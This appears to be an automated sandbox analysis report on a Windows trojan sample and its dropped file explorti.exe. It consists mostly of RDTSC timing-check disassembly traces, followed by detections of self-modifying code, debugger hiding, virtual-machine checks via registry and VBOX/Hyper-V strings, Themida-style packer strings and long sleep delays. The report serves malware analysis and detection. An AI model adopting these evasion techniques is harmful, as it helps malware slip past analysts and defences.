Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DD078E second address: 4DD07E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jmp 00007FABC9471C2Fh 0x00000010 lea eax, dword ptr [ebp-10h] 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FABC9471C34h 0x0000001a sub ah, 00000058h 0x0000001d jmp 00007FABC9471C2Bh 0x00000022 popfd 0x00000023 mov di, si 0x00000026 popad 0x00000027 mov dword ptr fs:[00000000h], eax 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DD07E0 second address: 4DD07E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DD07E4 second address: 4DD07EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DD07EA second address: 4DD0832 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD766h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c jmp 00007FABC90CD760h 0x00000011 mov eax, dword ptr [esi+10h] 0x00000014 jmp 00007FABC90CD760h 0x00000019 test eax, eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DD0832 second address: 4DD0836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DD0836 second address: 4DD083A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DD083A second address: 4DD0840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DD0840 second address: 4DD08DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD764h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FAC3B71CC22h 0x0000000f jmp 00007FABC90CD760h 0x00000014 sub eax, eax 0x00000016 jmp 00007FABC90CD761h 0x0000001b mov dword ptr [ebp-20h], eax 0x0000001e jmp 00007FABC90CD75Eh 0x00000023 mov ebx, dword ptr [esi] 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007FABC90CD75Eh 0x0000002c add si, 0968h 0x00000031 jmp 00007FABC90CD75Bh 0x00000036 popfd 0x00000037 mov cx, 835Fh 0x0000003b popad 0x0000003c mov dword ptr [ebp-24h], ebx 0x0000003f jmp 00007FABC90CD762h 0x00000044 test ebx, ebx 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 mov ax, dx 0x0000004c mov ch, dl 0x0000004e popad 0x0000004f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DD08DA second address: 4DD08EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FABC9471C2Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DD08EC second address: 4DD0927 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD75Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FAC3B71CAD6h 0x00000011 jmp 00007FABC90CD766h 0x00000016 cmp ebx, FFFFFFFFh 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov ebx, 567468A0h 0x00000021 mov esi, edx 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DD0927 second address: 4DD093C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FABC9471C31h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DD093C second address: 4DD027F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FAC3B71CA8Dh 0x0000000d jne 00007FABC90CD779h 0x0000000f xor ecx, ecx 0x00000011 mov dword ptr [esi], ecx 0x00000013 mov dword ptr [esi+04h], ecx 0x00000016 mov dword ptr [esi+08h], ecx 0x00000019 mov dword ptr [esi+0Ch], ecx 0x0000001c mov dword ptr [esi+10h], ecx 0x0000001f mov dword ptr [esi+14h], ecx 0x00000022 mov ecx, dword ptr [ebp-10h] 0x00000025 mov dword ptr fs:[00000000h], ecx 0x0000002c pop ecx 0x0000002d pop edi 0x0000002e pop esi 0x0000002f pop ebx 0x00000030 mov esp, ebp 0x00000032 pop ebp 0x00000033 retn 0004h 0x00000036 nop 0x00000037 pop ebp 0x00000038 ret 0x00000039 add esi, 18h 0x0000003c pop ecx 0x0000003d cmp esi, 00965678h 0x00000043 jne 00007FABC90CD740h 0x00000045 push esi 0x00000046 call 00007FABC90CDFC3h 0x0000004b push ebp 0x0000004c mov ebp, esp 0x0000004e push dword ptr [ebp+08h] 0x00000051 call 00007FABCD580ABFh 0x00000056 mov edi, edi 0x00000058 jmp 00007FABC90CD75Eh 0x0000005d xchg eax, ebp 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007FABC90CD767h 0x00000065 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DC0CE4 second address: 4DC0CF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov dx, FB72h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 mov dl, ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DC0CF6 second address: 4DC0D01 instructions: 0x00000000 rdtsc 0x00000002 movsx edx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 mov ebx, esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DC0D01 second address: 4DC0D1E instructions: 0x00000000 rdtsc 0x00000002 mov ah, 44h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FABC9471C2Fh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DC0D1E second address: 4DC0D3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD769h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DC0D3B second address: 4DC0D57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DC0D57 second address: 4DC0D76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FABC90CD769h 0x00000009 pop eax 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: E8F20C second address: E8F213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 1015517 second address: 1015544 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edx 0x00000006 pop edx 0x00000007 jmp 00007FABC90CD763h 0x0000000c js 00007FABC90CD756h 0x00000012 jmp 00007FABC90CD75Ch 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 10156A3 second address: 10156A8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 10156A8 second address: 10156AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 1015823 second address: 101583E instructions: 0x00000000 rdtsc 0x00000002 jp 00007FABC9471C2Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jg 00007FABC9471C2Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 10159F3 second address: 10159F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 10159F9 second address: 10159FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 10159FD second address: 1015A28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD766h 0x00000007 jng 00007FABC90CD756h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 ja 00007FABC90CD756h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 1019951 second address: 1019983 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FABC9471C28h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007FABC9471C31h 0x00000018 jmp 00007FABC9471C2Dh 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 1019983 second address: 10199AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD766h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007FABC90CD75Ch 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 10199AD second address: 10199D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jl 00007FABC9471C34h 0x00000013 push eax 0x00000014 push edx 0x00000015 jnp 00007FABC9471C26h 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 1019A17 second address: 1019A4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FABC90CD756h 0x0000000a popad 0x0000000b pop ebx 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 mov edx, 2F208977h 0x00000016 push 1DD728BDh 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e jmp 00007FABC90CD768h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 1019A4F second address: 1019A54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 1019B78 second address: 1019B7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 1019D44 second address: 1019D4E instructions: 0x00000000 rdtsc 0x00000002 ja 00007FABC9471C2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 1019D4E second address: 1019D80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jbe 00007FABC90CD75Ah 0x0000000d nop 0x0000000e xor si, 11A6h 0x00000013 push 00000000h 0x00000015 mov ecx, dword ptr [ebp+122D2D00h] 0x0000001b mov edi, dword ptr [ebp+122D38B9h] 0x00000021 call 00007FABC90CD759h 0x00000026 pushad 0x00000027 push edi 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 1019D80 second address: 1019DB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jg 00007FABC9471C26h 0x0000000c jbe 00007FABC9471C26h 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 jmp 00007FABC9471C34h 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 1019DB2 second address: 1019DB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 1019DB6 second address: 1019DBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 1019DBA second address: 1019DDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FABC90CD760h 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e pushad 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pop edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 1019DDB second address: 1019DEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 1019DEC second address: 1019DF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 1019DF3 second address: 1019E63 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jno 00007FABC9471C26h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d mov dword ptr [ebp+122D3901h], esi 0x00000013 push 00000003h 0x00000015 mov ecx, 18BB6F0Ch 0x0000001a pushad 0x0000001b mov dword ptr [ebp+122D1D1Bh], ebx 0x00000021 movzx edx, ax 0x00000024 popad 0x00000025 push 00000000h 0x00000027 jnp 00007FABC9471C2Ch 0x0000002d push 00000003h 0x0000002f push 00000000h 0x00000031 push ebp 0x00000032 call 00007FABC9471C28h 0x00000037 pop ebp 0x00000038 mov dword ptr [esp+04h], ebp 0x0000003c add dword ptr [esp+04h], 0000001Ch 0x00000044 inc ebp 0x00000045 push ebp 0x00000046 ret 0x00000047 pop ebp 0x00000048 ret 0x00000049 and edi, dword ptr [ebp+122D2CF4h] 0x0000004f mov edi, dword ptr [ebp+122D2C30h] 0x00000055 push C75AB2FCh 0x0000005a push eax 0x0000005b push edx 0x0000005c push ebx 0x0000005d push edi 0x0000005e pop edi 0x0000005f pop ebx 0x00000060 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 1019E63 second address: 1019EAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 075AB2FCh 0x0000000f jnc 00007FABC90CD75Ch 0x00000015 lea ebx, dword ptr [ebp+1245E895h] 0x0000001b mov edi, dword ptr [ebp+122D3465h] 0x00000021 jmp 00007FABC90CD75Ah 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FABC90CD764h 0x0000002e rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 1019EAB second address: 1019EB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FABC9471C26h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 103A28E second address: 103A29D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 push edx 0x00000007 jbe 00007FABC90CD75Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 100BF5F second address: 100BF84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C2Eh 0x00000007 ja 00007FABC9471C2Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 100BF84 second address: 100BFA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FABC90CD764h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 100BFA0 second address: 100BFBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FABC9471C39h 0x0000000a rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Special instruction interceptor: First address: 96EA2A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Special instruction interceptor: First address: B47B78 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Special instruction interceptor: First address: B30931 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Special instruction interceptor: First address: BA5C30 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: E8EA2A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 1067B78 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 1050931 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 10C5C30 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe

Code function: 0_2_04E20BA6 rdtsc

0_2_04E20BA6

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Thread delayed: delay time: 180000

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 690	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 390	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 653	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 689	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 723	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 3664	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 5556	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 5556	Thread sleep time: -72036s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 1160	Thread sleep count: 690 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 1160	Thread sleep time: -1380690s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 964	Thread sleep count: 390 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 964	Thread sleep time: -11700000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 1840	Thread sleep time: -540000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 1548	Thread sleep count: 653 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 1548	Thread sleep time: -1306653s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 3508	Thread sleep count: 689 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 3508	Thread sleep time: -1378689s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 3580	Thread sleep count: 723 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 3580	Thread sleep time: -1446723s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 3508	Thread sleep count: 3664 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 3508	Thread sleep time: -7331664s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread delayed: delay time: 30000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread delayed: delay time: 180000			Jump to behavior

Source: explorti.exe, explorti.exe, 00000008.00000002.1972526106.0000000001020000.00000040.00000001.01000000.00000008.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: explorti.exe, 00000002.00000003.3388620641.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000002.00000002.3856846494.0000000001372000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000002.00000003.3071340441.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000002.00000002.3856846494.00000000013B0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe, 00000000.00000002.1468928029.0000000000B00000.00000040.00000001.01000000.00000003.sdmp, explorti.exe, 00000002.00000002.3855716618.0000000001020000.00000040.00000001.01000000.00000008.sdmp, explorti.exe, 00000008.00000002.1972526106.0000000001020000.00000040.00000001.01000000.00000008.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: explorti.exe, 00000002.00000003.3388620641.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000002.00000003.3071340441.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000002.00000002.3856846494.00000000013B0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW?

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger	Jump to behavior

Potentially malicious time measurement code found

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe

Code function: 0_2_04E20938 Start: 04E20942 End: 04E2094C

0_2_04E20938

Tries to detect sandboxes and other dynamic analysis tools (window names)

